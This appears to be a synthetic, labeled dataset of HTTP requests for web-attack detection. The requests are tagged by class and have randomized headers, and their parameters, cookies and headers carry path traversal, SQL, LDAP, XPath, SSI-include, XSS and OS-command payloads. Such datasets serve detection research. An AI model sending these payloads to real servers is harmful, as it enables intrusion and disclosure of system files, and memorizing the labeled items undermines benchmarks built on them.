Authorization: Digest opaque="rseh"
Range: -348176
Referer: http://qhrEe.com/oaNp/nhentl/sriar.doc
TE: trailers,trailers,deflate
Trailer: Proxy-Authorization
User-Agent: sZvjyFY http://www.6Hsea.uk
UA-CPU: 68000
UA-Disp: 9162,3647,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 7804x6342
Via: 3.2 38.171.57.153
Transfer-Encoding: compress
Upgrade: teh/3.7, eErn/1.4, yrgp42/8.0, 3Ets/1.6
Warning: 494 www.yte1Tn.shtml "iewe" 
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 0288802054604644545
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38586
Start - Id: 36428
class: OsCommanding
POST /Vhh/aeertr1sdgce1/hPj4WLB7GSSl/paeyftdaiekbuaehl/mfYL.Vdlocation7fDIEa/gaZ02jjlEB3UV/g0H0x9H/e_4Jdz-zEJqIgcSqsR/j0AfIchildot/hEtcmss.gif? HTTP/1.0
Content-Length: 142
Content-Encoding: identity
Content-Location: http://yfcapto.st/0NIoai.asp
Content-MD5: aHpldWNhZWVzc290aWUwbg==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Mon, 05 Jun 06 14:10:56 GMT
Host: 209.235.35.123
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Cookie: narrbj40=28724;Esnttll=bulk     insert   rMoRlyisRt from  'pwdump.exe'          with     (codepage='RAW'    )
Cookie2: $Version="34"
Date: Fri, 27 Oct 06 18:35:00 CET
ETag: W/"NwmNKnr9go.8dfbSjLgc"
Expect: 100-continue
From: e9qusbs@jemdi.gov
Referer: /optslath/eod4rbea/ihcsE/Micrc/emahdef.asp
TE: trailers,trailers,gzip;q=0.7
User-Agent: aDaItmFH http://www.ae4afoem.gov
Warning: 855 157.103.78.122:36 "yslflExEn3ciyedsd" 

e5=opentb aechoawhereiframe]binewt &wunionshutdownnetcatcpscriptZY='p&xtene=87605&Ioe=Eacceptdeep5&oeeseseOswispba=0804&L6SUZ3btanR=ynXbat

End - Id: 36428
Start - Id: 41049
class: SqlInjection
GET /yw1Q5wsz.Z_/cxm/E5BrmuCB/ln4mssAkJS0Lawn/nniS9aaErYmumaI/tE6n1gpmnleb1IDhksrv/tTi7iD.tiff?prEiu=4522904&tteA7lbeardEel=704&8QdIP5oP-f=c&mts=nuf_ADmqPM3M&6aglsxhdcrEjn=bulk++insert++++iakitsp0e+from+++++%27pwdump.exe%27+++++with+++%28codepage%3D%27RAW%27%29&4aitmo5urfnrnet=%2Bl HTTP/1.1
Host: www.qDweloi.st
Connection: keep-alive
Accept: image/*;q=0.2, audio/x-wav;q=0.6
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: mwnaidna='lE'
Client-ip: 228.4.149.91
Cookie: mcrit49l=tcknsoas1;nhdeTpk=bnph-atb;dsfoaaoo0oOth=d=n+E xtermmochartt;dchliZieAt=e n
Cookie2: $Version="90"
Date: Tue, 27 May 08 06:20:40 GMT
ETag: W/"8ZFZf9yc-djNYPGhy8y"
Expect: 100-continue
From: 4a4Ax80@ieieio.ch
If-Modified-Since: Sun, 07 Feb 10 17:03:43 UTC
If-Unmodified-Since: Tue, 07 Nov 06 15:30:30 UTC
If-Match: "4NWRnqIauxuK56ERj"
If-None-Match: *
If-Range: Sun, 02 Jul 06 13:48:29 GMT
Max-Forwards: 435
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Digest cnonce="jpdruSsi"
Authorization: Digest algorithm=MD5
Range: 7-04,570-
Referer: /eub7cafa/hEhdly/tlCt/anee.gz
TE: trailers
User-Agent: Mozilla/1.2 (X11; U; Solaris 9.8; 7I-et; rv:4.1.3) Gecko/98904317
UA-CPU: PowerPC
UA-Disp: 439,0025,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 967x915
Via: 9.1 www.edFayer.gif, 4.2 171.159.146.43:254
Transfer-Encoding: compress
Upgrade: noqd/4.9, eti/6.4, 0arte/8.9
Warning: 428 www.ndOerieL.jpeg:9 "btsgnnnhoeooes5ArHa7" 
X-Forwarded-For: 57.95.233.202
X-Serial-Number: 54708069609443708
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41049
Start - Id: 38407
class: LdapInjection
GET /i0ZDPq82i/detoaicorbu/XP3voOLgz9@ZOV/RwnXGS/aSQl-o9qbP4j7Xyjks5/oODv/iFlinkp/tr2e5.htm?Siaqel=nxl&rhr72eeNohnf=82&whelZno3oeLlen=hIC&Mo9ati=60&Eq9=412523&phrnomk=etccbhnncqoxtermg&fejfttnm=6iies%29%28+%7C+++%28ie%3D*%29&dFrSefGDGj=223&hLaw=924035254&toydfsgA=fvarhbgsound%7Ceocee7&dxbesrAPyrd9=ga+fsock_streamaihl%28re+&4tyslrsr2ewurn9=i.w HTTP/1.1
Host: 143.154.72.3
Connection: n7nTzrk
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 167.68.68.243
Cookie: tcfeis47d=noeiG;9eto0=Renbc9;rrmOcedkautD8=me9awls;gMobject5oXR0HR=Oro;autEtaHtynnM2oe=edFz9ahndnem5h;B0wh2kscywttdc=eeb
Cookie2: $Version="47"
Date: Sun, 30 Dec 07 19:21:48 CET
ETag: "G4D6p25u0LPhzxVbK"
Expect: c2dEa
From: eife7@tfrg4tnjm.cz
If-Modified-Since: Sun, 01 Feb 09 16:32:11 UTC
If-Unmodified-Since: Sat, 12 Mar 05 03:51:09 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 03 Sep 04 18:54:04 UTC
Max-Forwards: 617
MIME-Version: 0.1
Pragma: r0E=uwl
Proxy-Authorization: h80n hmasNo=a0xee
Authorization: NTLM ZWhjOXhiaWlzZ3djbmFlbElBZXJ4ZUdvOUVkZXN4ZWllMnd0dG5uemVibHV3Yw==
Range: -96373
Referer: http://www.iifc.be/geaDhc/set0h8ms/lxiiQEh.nsf
TE: gzip;q=0.0,deflate;q=0.5
Trailer: From
User-Agent: 1dsdaemell/3.6.7.9
UA-CPU: MIPS
UA-Disp: 2631,041,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 7262x7113
Via: 2.3 www.nnm7tk.jpg:51, HTTP/2.6 51.101.238.227, FTP/6.3 156.249.199.208:5
Transfer-Encoding: deflate
Upgrade: Elgm/6.3, hea/6.4, She/5.1, dol/2.2
Warning: 898 www.secjq7.html "al2eoya0cgtS" 
X-Forwarded-For: 139.160.46.245
X-Serial-Number: 8565701730547644653
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38407
Start - Id: 37989
class: LdapInjection
GET /ac55mWu1r9kaH0_ay3Pd/pastoe7tn9ewnt5i/9s3Pr3ZpYPM.F1u2duIk.jpeg?sAwrsi6xcX6=%29+++%28+%7C++%28+cn%3D*o++%27brien*++%29%28mail++%3D*o++++%27brien*++%29+++&sa=rcmr%5CU%29aao8i HTTP/1.0
Host: 6.159.214.38
Connection: Oe7nz
Accept: application/*, audio/x-wav, video/quicktime
Accept-Charset: x-mac-turkish, iso-2022-kr;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 181.41.234.72
Cookie: 8uorvoda08toasj=i
Cookie2: $Version="279"
Date: Tue, 18 Jan 05 09:01:45 UTC
ETag: W/"X6DZQRvQqkAgn7Mj"
Expect: 100-continue
From: peRu9mr@dtroN.gov
If-Modified-Since: Wed, 11 Aug 04 15:04:12 UTC
If-Unmodified-Since: Sat, 25 Jul 09 24:58:52 UTC
If-Match: "DIrgNt38o2Ti-BleRxrL"
If-None-Match: *
If-Range: Sun, 07 Jun 09 02:16:55 CET
Max-Forwards: 7
MIME-Version: 4.1
Pragma: eSNA='Qd'
Proxy-Authorization: Digest nc=Fe26BDc0
Authorization: Basic RWJlbjppdGV0
Range: 4893-,-7197
Referer: /noolu0o/tafia/ninlfwaf/enlrda.bin
TE: trailers,gzip
Trailer: Warning
User-Agent: Mozilla/1.5 (Windows; U; Windows NT 6.3; de-ae; rv:2.1.8) Gecko/48733669
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 8848x2681
Via: n30rte/9.4 www.aaVio5.shtml, trsalj/8.2 www.sns5inio.gif
Transfer-Encoding: identity
Upgrade: 9aaia/6.6
Warning: 919 www.siLiann.jpg:37 "teLew" 
X-Forwarded-For: 59.231.233.194
X-Serial-Number: 800649
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37989
Start - Id: 45779
class: PathTransversal
GET /l5Q6Cwg/iao9ku6fnttzio/etejwgrhletssl/S2SsI.m3a-/foNAdrzrrlMkhr4as/abo9eaehiconfn/ZRopen.css?Ev0adkVlJPd=%28bOobgl0tcebgsoundahy&hCG7too5xmLceXr=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&eOerol=w&i3rMnC28h_ov=092&r5=89&cao=3798026&UZNf_PG=mQ_bDz&daeehmyl=46571&Nbole3nlte25e=my09P&algirroEu=38&eer9t=Tiarae HTTP/1.1
Host: 220.229.205.87:80
Connection: close
Accept: application/zip
Accept-Charset: iso-8859-5;q=0.8, iso-8859-3;q=0.5, windows-1254, x-mac-chinesetrad
Accept-Encoding: gzip, identity, deflate
Accept-Language: *
Cache-Control: min-fresh=93
Client-ip: 79.240.194.64
Cookie: zUe= rindausrteht<oo;dmlatp4=7
Cookie2: $Version="2"
Date: Fri, 10 Mar 06 16:48:55 CET
ETag: "o-Sve-wo4yNnUq.x7"
Expect: fli7=ifppb
From: a3y5m@itfi.st
If-Modified-Since: Thu, 21 Jan 10 23:48:41 GMT
If-Unmodified-Since: Sun, 28 Dec 08 18:18:23 CET
If-Match: *
If-None-Match: "D8ZJiNloG2M0lLIgu"
If-Range: "Irwt@In046fuLsQ0."
Max-Forwards: 0
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: nE0np rioae=tsisa
Authorization: NTLM aGh1RXZyZWltZ2RpYWxpc2VnbjNMb0ljbmV4NXViaG10YUJjRXlvaFl0ag==
Range: 61230-1,22438-
Referer: /asw9iigs/ztCn/Toieatr/haTsg/isidoy.htm
TE: gzip,trailers
Trailer: Accept-Charset
User-Agent: rmcmfnXn (svoU6d)
UA-CPU: PowerPC
UA-Disp: 4288,202,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7251x584
Via: HTTP/4.4 www.hpseIo.gif, 3.8 www.imr7y.jpg:2, 4.9 www.Fsod.js:0868
Transfer-Encoding: identity
Upgrade: uit4/0.5, toct/8.1, blgp/4.0
Warning: 712 www.oljITEeh.gif "uxn4he4amitIWjRw" "Sun, 25 Apr 04 03:24:53 GMT"
X-Forwarded-For: 0.142.120.56
X-Serial-Number: 324157325
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45779
Start - Id: 47596
class: XSS
GET /wvNOq/TUJR@mhetc.R/tdsruea/5D1dmOsr/otimetdcemirnCoY8.mdb?ozejetme=oweoPdzezUeZ&refce5=%3Cform%2Bname%3Daydi++++%3E%3Cselect%2Bname%3Dfri++%3Ehttp%3A%2F%2Fwww.esa.com%2F6ele%2F%3F%3C%2Fselect+++%3E%3C%2Fform%3E&yaaaoeo=bedi2ot%3F&tmardeyneloLf=4647661404&vcatuTZ.qrjO=oqiadsnn4ean+oe&btkg=50319583&dtasitdltm=nRiframeeEe&netqr0mo=1570&g2dexennd3c=aho&jrgas2LfObiat=ag3camdCep HTTP/1.1
Host: 86.160.35.22
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: x-mac-icelandic, iso-2022-jp
Accept-Encoding: identity;q=0.5, identity
Accept-Language: diemlip-sZo, sjet-eckd;q=0.9, me-u, d-sdc4eoi, A-6aehee;q=0.3
Cache-Control: nt5oo=2MFa8aae
Client-ip: 84.76.139.10
Cookie: ys=ho;P6DMpswget-telnetjsP=|g insert
Cookie2: $Version="1"
Date: Sat, 11 Nov 06 03:02:49 GMT
ETag: "XH4fCPIuXxAhkkU"
Expect: 100-continue
From: pefnsi@neeUgitin6.gov
If-Modified-Since: Sun, 20 Sep 09 14:01:42 GMT
If-Unmodified-Since: Wed, 14 Oct 09 22:04:16 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 411
MIME-Version: 8.3
Pragma: qshtAhwe=etbcne
Proxy-Authorization: Digest qop=m2ta
Authorization: Digest opaque="oy9ooutw"
Range: 849916-
Referer: /hz3hni/vtap0.pl
TE: chunked,gzip,chunked
Trailer: TE
User-Agent: loeadoHinT
UA-CPU: x86
UA-Disp: 672,0345,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0399x875
Via: HTTP/7.9 www.iesqo.html, 6.5 111.87.236.218
Transfer-Encoding: compress
Upgrade: o54f/1.0, eete/2.9, tgnu/1.6
Warning: 373 www.dtPeNLcw.css "mneticNase4" 
X-Forwarded-For: 28.174.36.198
X-Serial-Number: 2524902769036083814
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47596
Start - Id: 35176
class: SqlInjection
GET /ebet.shtml?e7o=%27+OR++++%27%27+++%3D+++%27&vtfaiwtrosabaws=2889906 HTTP/1.1
Host: 183.162.43.187
Connection: agl7seht
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: on=tEqloa
Client-ip: 171.171.6.105
Cookie: Nbrxtstoutdc1ad=51470
Cookie2: $Version="835"
Date: Mon, 26 Jan 04 05:36:44 UTC
ETag: "WokkLc._JOvblYu"
Expect: itEV
From: as5oeh@nl7ehee.ch
If-Modified-Since: Fri, 12 Jan 07 14:37:21 CET
If-Unmodified-Since: Wed, 08 Nov 06 09:36:44 UTC
If-Match: "KJjx2tr1ocariw4dVxfc"
If-None-Match: "v3cjvvcOnR_Z7M@P1JE"
If-Range: "bJzlcxk.qajChamg"
Max-Forwards: 81
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: NTLM bWM1dG80b0x0MjBzYWFzaXVmZXRzczlyM211NG5yaHR2YjNtbW5zY25sZTlsNWZv
Authorization: Basic ZXA5SW9BbDp0c214c3VldA==
Range: -619874,-90
Referer: /eOi9epno.js
TE: deflate;q=0.9
Trailer: From
User-Agent: rouJhoinec (iwkUBrxWi; wgzh0xsG; sTwBZTyjf; tSiaxPPn; sLAzJ0G_iW)
UA-CPU: StrongARM
UA-Disp: 1579,9873,8
Via: 2.7 69.209.232.196, 7.3 48.195.98.142, 5.5 www.6cno.css
Transfer-Encoding: identity
Warning: 749 www.DeYsfD6.gif:90 "Albacnauthecopstseao" "Mon, 14 Feb 05 18:04:54 CET"
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35176
Start - Id: 45270
class: PathTransversal
GET /5zJXQi82/oF4Vf6u3SApmOaLqdh/7ezT0gfS@LFQjaE5qM/snnolndz/hz6I/nPD-SkU9XZulRY_.shtml? HTTP/1.0
Host: 178.88.22.221
Connection: yMnseF
Accept: */*
Accept-Charset: iso-8859-15;q=0.3, ks_c_5601-1987;q=0.5, iso-8859-5;q=0.7, windows-1252
Accept-Encoding: ../../../../../../WINDOWS/autoexec.bat
Accept-Language: *
Cache-Control: max-age=7496
Cookie: pesaatoR56y=f;noqu=0606;IiauttpR=sphWeatweeM
Cookie2: $Version="48"
Date: Sat, 06 Jan 07 01:22:30 GMT
ETag: "_6bFj6M4O-5p6MfZP_"
Expect: 100-continue
From: ra7rtweh@ttrsy.org
If-Modified-Since: Wed, 18 Feb 04 13:24:45 GMT
If-Unmodified-Since: Thu, 10 Jun 04 07:17:53 UTC
If-Match: *
If-None-Match: "APUUCG3kwkTUo5cNtCwb"
If-Range: Thu, 11 Aug 05 03:56:44 GMT
Max-Forwards: 8835
Pragma: no-cache
Proxy-Authorization: eTmzhs 3na6=hNseeew
Authorization: NTLM WWV0eW9zZWR5U2tFdGhzZWw5aWZ0Y3NzdThvaGFzbDF0cncwVmhldGE=
Referer: http://ph2rsCh.it/aeeat9q.tar
TE: trailers,chunked,deflate;q=0.1
User-Agent: Mozilla/1.3 (Windows; U; Win 9x 9.9; ti-wi; rv:5.6.9) Gecko/28458137
UA-CPU: Sparc
UA-Disp: 4571,953,16
Via: rlin/3.4 210.103.236.155
Transfer-Encoding: deflate
Upgrade: rY7u/3.8, gk6/3.2, o8xHs/4.5, eog/8.6

null

End - Id: 45270
Start - Id: 49182
class: XPathInjection
GET /ogzJbPDkE-/passwdQucmdVbAv0drrX/snreS8ie5forw8f.jpeg?jhtrn5faoEi=%5DeL3+7%7E&etrms=0027507635&EcNuoxftogE=1InpPsTrdte2eceThinserta&-pOusrJpPB=teag&briPSbnnoeijey=eb23C4l&du=+m&tnre=105539&reod8oukie1=oBgHQn&accept0Jin1zUIr=eposEwMziMa1eel&llSa25=o42eunRR&io=6&eaooed=0DKP3nXWkWu&oSltif=%28i+%3C++count%28an%2Fchild%3A%3Atext%28%29%29++and++++j++++%3C++count%28bdu%2Fchild%3A%3Acomment%28%29%29++++and+++++k+++%3C+++++count%28eeeEsh%2Fchild%3A%3A*%29+%29&nEu3W0UBWWZ=izuHql_Six HTTP/1.1
Host: 44.47.160.165
Connection: seot
Accept: text/xml;q=0.2, audio/*;q=0.1
Accept-Charset: *;q=0.5
Accept-Encoding: identity;q=0.7, gzip;q=0.6, compress;q=0.7
Accept-Language: *
Cache-Control: no-cache
Client-ip: 192.197.118.16
Cookie: ore02=tsj mecotgg;6Oaca=boot.inin;mysaauryisnego=687;alua=72518;el==ggsRcaT
Cookie2: $Version="33"
Date: Fri, 04 May 07 15:54:53 UTC
ETag: W/"YOmK8QeytA-289Ya"
Expect: 100-continue
From: ir0psea@aO25fruan.gov
If-Modified-Since: Wed, 25 Feb 09 09:12:45 UTC
If-Unmodified-Since: Sat, 24 Jun 06 14:14:35 CET
If-Match: *
If-None-Match: *
If-Range: "4ROC4scnR6FUJRKtQZkB"
Max-Forwards: 9639
MIME-Version: 6.2
Pragma: vretceas=uufr
Proxy-Authorization: Basic bnRlbHdoZXc6bnRpZQ==
Authorization: NTLM ZDB0NThybHNoMmFyZ2VIcmloaUVhWGVvb2VBbmNlbmVq
Range: 87-,-69535,7135-70843
Referer: http://17dlnsmt.uk/Tsmtosa.jpeg
TE: trailers,gzip;q=0.2
Trailer: Date
User-Agent: Mozilla/7.2 (Windows; U; Win 9x 9.1; ec-fL; rv:4.1.8) Gecko/08253514
UA-CPU: x86
UA-Disp: 577,972,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 400x881
Via: 5.9 1.255.10.84
Transfer-Encoding: gzip
Upgrade: q8iste/1.0, ici/0.5, qtyr3/1.9, oea/6.5, h1e5st/7.2
Warning: 858 www.efhrohf.jpg "oIntdrztcn98" 
X-Forwarded-For: 19.241.14.123
X-Serial-Number: 6850092
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49182
Start - Id: 40698
class: SSI
POST /vltGotsveuoktnhlneb.cfm? HTTP/1.0
Content-Length: 67
Content-Encoding: gzip
Content-Location: http://seju.org/tngl/zwe7er.htm
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 08 Nov 08 15:05:28 UTC
Host: www.delsuuh.org
Connection: close
Accept: audio/x-wav
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: <!--  #include  virtual="c:\winnt\system.ini" -->
Cookie: 4np=ca3b0e;aesgt=rribuBT2hpeceaHwdi;FrOdWbpFR=813;fo=ncDauhenbe(
Date: Thu, 06 May 04 02:03:50 CET
From: it4riort@8ismert.net
If-Modified-Since: Sun, 09 Apr 06 23:03:09 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 03 Jul 04 18:07:23 CET
Max-Forwards: 75
Range: 163476-252825
Referer: /a5thrtrz/peoe/tA5d/eoe5arme.jpeg
User-Agent: Mozilla/4.6 (Windows; U; Windows NT 4.1; Th-xa; rv:2.0.4) Gecko/11122388
UA-CPU: 68000
UA-OS: Solaris
Transfer-Encoding: gzip
Warning: 785 www.Mreadie.tiff "8etiei" 

ndorut=m&ycucwrgaaael9= eaautoexectes9&Fo5_N-=io]s0&eeGGhrtsn7=36

End - Id: 40698
Start - Id: 36336
class: PathTransversal
GET /t1XwuXpt9qTx_Kx/laed/PzFrGy9.CzI/iGFT6eSvjOHaW/we/cdg0d/fapbee67hj/wHgqQ2sIns3F-lYuCv/hLbYjbVM8/m6Ck1zMl.gif?ehe=331728&rtT=2567017428&ee2eosee2ac52oj=daosrnOiN&tlur=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&OQbQxtermn=1wftcmjps&BnullNlE=zoaccess_logsv&I3FoydR=document%3Epn&CHPuX-JRh=a0e&dhyer=7%29oo%3Aas%5Cim+e&hes=02 HTTP/1.0
Host: www.it1lh.net
Connection: close
Accept: */*;q=0.6
Accept-Charset: iso-2022-kr, x-mac-cyrillic;q=0.4, gb2312
Accept-Encoding: deflate;q=0.7, gzip, deflate, compress;q=0.8, identity
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 179.242.140.245
Cookie: tleDraroftytira=?ter;aotMlreXtPi1=nveTcb;RYlogK5jPtX2P=52246655
Cookie2: $Version="046"
Date: Thu, 31 Mar 05 14:52:33 GMT
ETag: W/"vPrR@V7cv9OAFF.ubB"
Expect: 100-continue
From: imeua@eefaielgto.it
If-Modified-Since: Fri, 09 Feb 07 11:50:15 CET
If-Unmodified-Since: Tue, 14 Sep 04 23:27:34 GMT
If-Match: *
If-None-Match: "othgk8Zr41xdFW1cnjFU"
If-Range: ".EK8LPwHe3nrwYsMSq"
Max-Forwards: 4325
MIME-Version: 4.2
Pragma: 3imqod4l='xyeh'
Proxy-Authorization: Digest response="Fa230DfDdCBDc8d6dFdD9e980dE5c6ab"
Authorization: NTLM VGVCVG5PbHNndGVoZ21ncGFoQXFlb2hubGIxd2Fyc1NiYWtiMW5zZWE0YWRjYjY=
Range: 94941-674,-88804,1546-98301
Referer: /toeixu/ryn0f.dll
TE: trailers
Trailer: User-Agent
User-Agent: SiydfeY (rvZcwR_Gk; rmsSjW0; 6iAqdnYv)
UA-CPU: PowerPC
UA-Disp: 617,065,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 625x983
Via: eryte/3.8 www.iyrrP.css:5320, 9.3 109.182.26.199, FTP/2.4 www.9ts7.css
Transfer-Encoding: gzip
Upgrade: itor/5.7, 4up4ta/3.2
Warning: 187 www.erlho.html "TnrEu" "Thu, 07 Sep 06 16:36:18 GMT"
X-Forwarded-For: 112.141.222.2
X-Serial-Number: 9001886715622
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36336
Start - Id: 42808
class: OsCommanding
GET /cm1qLgnJI59rve-/mrwn/tw-3Eqtm.gif?dpPT@mHqfMM=so&a-hFvar=iz9S03o48&ishaeaa26dsA=sfncn&x8CueRiartc0n=mhidgroup+byT&ntilrivo=eai6wxytlaosVnL&oe=22542012&GAQw_hHgI=ss9EtSef5unmh0iX&aeaspauhp=+sE4hae+ssrn9eM0+&binkscriptKhS1rnpnullg=ne5%3B%29xohlowtt%5C9hyo HTTP/1.0
Host: www.astrfell.be:001
Connection: 6seadxsl
Accept: video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: Tis='Ecgyfjuc'
Cookie: moutur=598535;uz7documentnKWe6Ck=|  dir     ..\\..\\..\\..\\..\\..\\..\\    ,;h64j=7583644;4g01Sp=8
Date: Mon, 26 Mar 07 03:11:30 CET
Expect: 100-continue
If-Modified-Since: Thu, 15 Oct 09 24:19:28 UTC
If-Unmodified-Since: Sun, 21 Sep 08 20:05:59 GMT
If-Match: *
Max-Forwards: 283
Authorization: NTLM dHNvZWhvY2VlY29hMHpTYUFwNmNkZ3J0cnRkdWF1bjRlYWhxa25hb25xZXlpaWd1
Referer: /atFz.jpeg
TE: chunked,trailers
User-Agent: nyDvoM9Vu http://www.rhdibegx.it
Via: 9.3 www.oeefaec.css, 6.9 118.192.175.115
Upgrade: 5ysrea/7.9, edh/7.4, bcIoo/0.0, 3rpop/2.3

null

End - Id: 42808
Start - Id: 39420
class: SSI
GET /c7Ys26igv/EscriptqUzq1RhXMRf0dservices/a5g0z3/tbC6IizyZMA4AM/ArphAonaeo5ehaP9U/13tmpQONtelneth4la/nd7K2I6IOEVLyyxGB_/Semv4tidesbatyhs7n9r/tz2/hvJaXnrU.cfm?tg=899440533&a1Es9iKtpgel9ab=h2iH&2tYnorilei4Vht=%3C%21--%23email+fromhost%3D%22www.rfloe6o.com%22+tohost%3D%22mailbox.8rn.com%22+message%3D%22upot+htodin+isgio+xfnLq%22+fromaddress%3D%22rssz.com%22+toaddress%3D%22ede.ro.com%22+subject%3D%22te%22+sender%3D%22tc.com%22+replyto%3D%22h0tCmxe.com%22+cc%3D%228vNl%22+inreplyto%3D%22lel+eqb+n%22+id%3D%22csIctmail%22+--%3E&wh4oIdyr=%3Chomestdesz&haihre0tchmcaQ=2s7 HTTP/1.1
Host: 176.229.185.217
Connection: keep-alive
Accept: video/quicktime, application/zip;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: u-ltu;q=0.5, ns-mO, o8aiNi-o
Cache-Control: no-cache
Client-ip: 128.199.124.139
Cookie: aornaogf9Azh=icieTlnlibm8Lfarpopenel;xDi=s<NtnowgetEhwp->cmddropprocessing-instruction1gunionieval;lmhefeisrAith=selectsergnaymqa 
Cookie2: $Version="65"
Date: Mon, 14 Nov 05 03:59:50 GMT
ETag: W/"EqD@suDSZ-6kzkU3OMMy"
Expect: 100-continue
If-Modified-Since: Mon, 22 Oct 07 01:31:11 UTC
If-Unmodified-Since: Fri, 01 May 09 17:11:13 UTC
If-Match: "CyQfY5W.72ojlaLb8n"
If-None-Match: *
If-Range: "WPlAulL9yJ9KPNp"
Max-Forwards: 7763
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Basic M3dvaWU6MHk0Mms=
Authorization: Basic ZXk5ZW86b3lhb3J1
Range: 02-,96-
Referer: http://apen.it/nsetTlw/pt0on4/Jsttee/nmkcau4.php
TE: trailers,trailers
Trailer: Upgrade
User-Agent: 0L6CcoNL http://www.rcvhe5.st
UA-CPU: StrongARM
UA-Disp: 9324,2062,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3896x417
Via: HTTP/8.4 46.39.162.161:50
Transfer-Encoding: gzip
Upgrade: oonp/1.0
Warning: 911 148.86.166.125:8448 "aOi1" 
X-Serial-Number: 599135486061
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39420
Start - Id: 39825
class: SSI
GET /8REBmr/psRTFYr/vVl0_FSRjVgr/rteqsi/ismJNKnzYkwEznc_/ast/sttfxa0AMca/i.wtLO_iQeJ.tiff?zUtk=ervaow&odihaevj=%26nclinksdolhmSf-tnvriT&nsNkaKi=%3C%21--+++++%23include+++++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22--%3E&uIno7r=7&aaembbqtetail=tr&sx=2&wfseoo=cdae&n9Heece=atu%3Cidct%7CltTS&objectx0-b=2058 HTTP/1.0
Host: 113.85.92.157:2
Connection: teiEnfn
Accept: audio/basic
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: thuons-iOtgeed;q=0.8, scbbhrm4-p8dSh2o;q=0.0
Cache-Control: no-transform
Client-ip: 155.64.17.53
Cookie: lILfclsoE=zLnUcnidbs7hs;eOatunin=eetohNlthrgCygd;KXypassthruZdiv=iit T1teaIii;vhiRr5gn0m=bcDNit;bog0d4svif6oy=]5u;4onaeE=30007
Cookie2: $Version="15"
Date: Mon, 28 Jun 04 20:33:17 GMT
ETag: "1g_YhGJQjL63vJ@"
Expect: 100-continue
From: fEkbo16t@uycIttryA.biz
If-Modified-Since: Sat, 08 Jan 05 23:16:06 GMT
If-Unmodified-Since: Sat, 01 Nov 08 02:31:46 UTC
If-Match: *
If-None-Match: *
If-Range: "CBVbFXO0Zw6cSSU"
Max-Forwards: 8
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Basic aXRidHNkOndxdUVkaXJp
Authorization: taxs reahho=t9eaicne
Range: 2823-938,404128-
Referer: http://www.adiimdt.it/syzl/suelo/rrooidln/eJee0ir.ace
TE: trailers,gzip,trailers
Trailer: Accept-Encoding
User-Agent: Ojhso6gUanltd5ahez
UA-CPU: Sparc
UA-Disp: 052,114,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 9632x079
Via: HTTP/3.8 203.110.249.170:0
Transfer-Encoding: gzip
Upgrade: oLt/5.9, tEgb/6.9, 6laet/2.7, faare2/0.4, vst20/6.5
Warning: 236 www.per1iyt.gif "ivlawmebhs44spsee" "Sun, 20 Sep 09 12:22:58 GMT"
X-Forwarded-For: 142.194.73.31
X-Serial-Number: 408744625517883
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39825
Start - Id: 39187
class: SSI
